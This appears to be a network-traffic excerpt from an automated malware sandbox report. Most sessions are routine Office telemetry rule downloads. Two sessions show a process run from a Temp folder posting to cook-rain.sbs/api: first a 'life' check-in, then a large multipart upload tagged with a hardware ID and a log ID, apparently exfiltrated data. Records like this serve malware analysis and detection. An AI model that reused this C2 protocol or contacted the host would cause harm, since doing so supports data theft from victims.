                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111046Z-178bfbc474b9xljthC1NYCtw9400000001b0000000004b9q
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            112192.168.2.44985813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:46 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111046Z-1777c6cb754lv4cqhC1TEB13us0000000az000000000a3q1
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            113192.168.2.44985913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:45 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:46 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111046Z-178bfbc474bw8bwphC1NYC38b400000001a0000000001cvx
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:46 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            114192.168.2.44986013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:47 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111047Z-1777c6cb754lv4cqhC1TEB13us0000000b10000000005knc
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            115192.168.2.44986113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:47 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111047Z-r1d97b99577l6wbzhC1TEB3fwn0000000aeg0000000032v4
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            116192.168.2.449863188.114.96.34432896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC984INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=itt01ljl2q5gjp2l2ibfa6a2t6; expires=Mon, 17-Mar-2025 04:57:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7Edk%2FGHR3XXj6Pi7FYdD9uQCBArrT%2FjM9CEEd4OJKJlIsxyem8hgblbjmUx37f8hSKB7FrLZi5NumJxEBY2d%2B5sYh8BwnaJgFmWAC43yCi3IU%2BqKbQP9bu%2FEqyYNDwM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c3cc8968cd7-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2297&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1247863&cwnd=237&unsent_bytes=0&cid=e71970c05f653fbf&ts=833&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            117192.168.2.44986213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111048Z-178bfbc474bv587zhC1NYCny5w000000019000000000636c
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            118192.168.2.449866188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=OEA73934O2E6UM
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 580120
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 2d 2d 4f 45 41 37 33 39 33 34 4f 32 45 36 55 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4f 45 41 37 33 39 33 34 4f 32 45 36 55 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 45 41 37 33 39 33 34 4f 32 45 36 55 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 45
                                                                                                                                                                                                                                                                                                            Data Ascii: --OEA73934O2E6UMContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--OEA73934O2E6UMContent-Disposition: form-data; name="pid"1--OEA73934O2E6UMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OE
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: c3 40 7d 98 6b 1b f4 48 62 0c 70 5b 2a 37 da aa e6 b6 9a ff 60 ae c7 21 9b fb fe 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c
                                                                                                                                                                                                                                                                                                            Data Ascii: @}kHbp[*7`!yi*vhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?^ =0,
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 5c 96 0b 7a f0 2c de 8c cd 42 d2 23 c5 b6 e9 d6 31 d4 77 de ec 38 aa 2d d8 31 17 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb
                                                                                                                                                                                                                                                                                                            Data Ascii: \z,B#1w8-1Az!}2R~:,CfwekfDOsLRb1@g=i*<74S_5[i#b|{EW_|OOH?);El~VsIiC4xb}^p*i5vXDS3e_E3N3CiVl8~01
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: aa c8 8e 69 cf 50 cd 4f e0 94 d2 1e 01 b6 50 f5 9c 84 57 2f c0 9d d4 01 eb b7 37 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45
                                                                                                                                                                                                                                                                                                            Data Ascii: iPOPW/7_]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa |7r6;!_$E
